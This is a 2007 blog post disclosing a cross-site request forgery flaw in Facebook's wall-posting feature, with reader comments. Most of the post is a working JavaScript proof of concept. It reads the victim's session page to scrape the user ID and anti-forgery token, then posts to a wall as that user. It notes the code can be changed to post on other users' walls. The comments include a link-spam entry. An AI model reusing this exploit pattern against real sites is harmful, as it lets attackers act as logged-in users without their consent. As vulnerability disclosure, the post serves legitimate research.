Welcome to BARMAGY Sign in | Join | Help

Facebook Wall Security Vulnerability

In Facebook if a user is logged in with the “Remember Me” option an attacker can make requests on behalf of the user to make wall posts by sending him/her a URL that contains ajax java script code that will call the Facebook services and do the post on behalf of the user using his/her stored credentials in the browser cookies. Facebook actually have anticipated this attack and used a technique that generates a random hash that is used as an authentication token with every request to their services to insure that the request have been done by the user himself and is originating from the Facebook ajax java script, this token is rendered in the Facebook html and must be sent with each request or it will be ignored, but this token can be obtained by the attacker by simply requesting the page first with the user credentials (which is stored on the user machine in browser cookies), then the attacker can proceed with the attack. I’ve written a proof of concept code for this issue. This code if executed by the user it will post the “Proof of Concept” message on the user wall. You can also change the code so it can post on others walls.

<script>

xmlHttp = GetXmlHttpObject()

var url = "http://www.facebook.com"

xmlHttp.onreadystatechange=stateChanged

xmlHttp.open("GET",url,true)

xmlHttp.send(null)

 

function stateChanged()

{

    if (xmlHttp.readyState==4)

    {

            //here we get the current logged in user id

            var user = xmlHttp.responseText.substring(xmlHttp.responseText.indexOf('name="user" value="') + 19, xmlHttp.responseText.indexOf('"', xmlHttp.responseText.indexOf('name="user" value="') + 19))

            //then we get the token hash that must be sent with every request

            var post_form_id = xmlHttp.responseText.substring(xmlHttp.responseText.indexOf('name="post_form_id" value="') + 27, xmlHttp.responseText.indexOf('"', xmlHttp.responseText.indexOf('name="post_form_id" value="') + 27))

            var xmlHttpPost = GetXmlHttpObject()

            xmlHttpPost.open("POST", "http://www.facebook.com/ajax/wallpost_ajax.php", true)

            xmlHttpPost.setRequestHeader("Content-Type","application/x-www-form-urlencoded")

            //we will make a post to the current user wall

            //we can make posts to other users walls too

            //by changing the "to" parameter to another user ID

            xmlHttpPost.send("to=" + user + "&from=" + user + "&wall_text=Proof of Concept&post_form_id=" + post_form_id + "&post_form_id=" + post_form_id)

    }

}

 

function GetXmlHttpObject()

{

  //i didn't add the code to create the XHR object for firefox because

  //it doesn't work on firefox already, if you have time to test this

  //POC with other browsers and it worked please let me know

  var xmlHttp

    try

      {

      xmlHttp=new ActiveXObject("Msxml2.XMLHTTP")

      }

    catch (e)

      {

      xmlHttp=new ActiveXObject("Microsoft.XMLHTTP")

      }

  return xmlHttp

}

 

</script>

 

Published Thursday, December 27, 2007 6:00 PM by Fady

Comment Notification

If you would like to receive an email when updates are made to this post, please register here

Subscribe to this post's comments using RSS

Comments

# Facebook Wall Security Vulnerability

You've been kicked (a good thing) - Trackback from DotNetKicks.com
Saturday, December 29, 2007 4:46 PM by DotNetKicks.com

# re: Facebook Wall Security Vulnerability

Wouldn't this only work if the script were hosted on Facebook.com?  Apart from some cross-domain Ajax hack, that is... typical browser security wouldn't allow an XMLHttpRequest to connect to a remote domain.  And not all cross-domain hacks would work, since the request still has to originate with the client so as to grab the user ID and post_form_id from the home page source...
Monday, February 18, 2008 11:36 PM by theharmonyguy

# re: Facebook Wall Security Vulnerability

"Wouldn't this only work if the script were hosted on Facebook.com?" if u r using firefox then yes else if u r using IE7 then no

"typical browser security wouldn't allow an XMLHttpRequest to connect to a remote domain"
seems like IE development team don't share this point of view with the majority of us :)
Wednesday, February 20, 2008 4:45 PM by Fady

# re: Facebook Wall Security Vulnerability

You sure that's the default behavior?  My tests have shown that local XMLHttpRequest works fine in IE7, but a remote request fails to connect.

For example, try clicking test on this page in IE7: http://theharmonyguy.com/xhrtest.html  Then fill in a remote domain and click test again - I get an access denied error.
Wednesday, February 20, 2008 11:48 PM by theharmonyguy

# re: Facebook Wall Security Vulnerability

yes i've tested this on several machines
also i've tested this again using ur script and it opens different domains without any problems and it gave me back response from yahoo.com with 200 success message and then the html content
nice script by the way :)
Thursday, February 21, 2008 5:17 PM by Fady

# re: Facebook Wall Security Vulnerability

Thanks!

Found this today:
http://msdn2.microsoft.com/en-us/library/ms537505.aspx
Monday, February 25, 2008 8:21 PM by theharmonyguy

# re: Facebook Wall Security Vulnerability

I think if the developer should take care from that and use parameters in his query and should work his query from stored procedures and dont write queries in the code directly or any sql command.
Tuesday, March 04, 2008 11:38 AM by Khaled Mahmoud

# re: Facebook Wall Security Vulnerability

VGc0lN  <a href="http://qevleldqdpel.com/">qevleldqdpel</a>, [url=http://sufqtszehiuj.com/]sufqtszehiuj[/url], [link=http://ksmiduilocil.com/]ksmiduilocil[/link], http://yvzkfbivabtx.com/
Thursday, May 08, 2008 5:02 AM by kzkjfq

What do you think?

(required) 
required 
(required)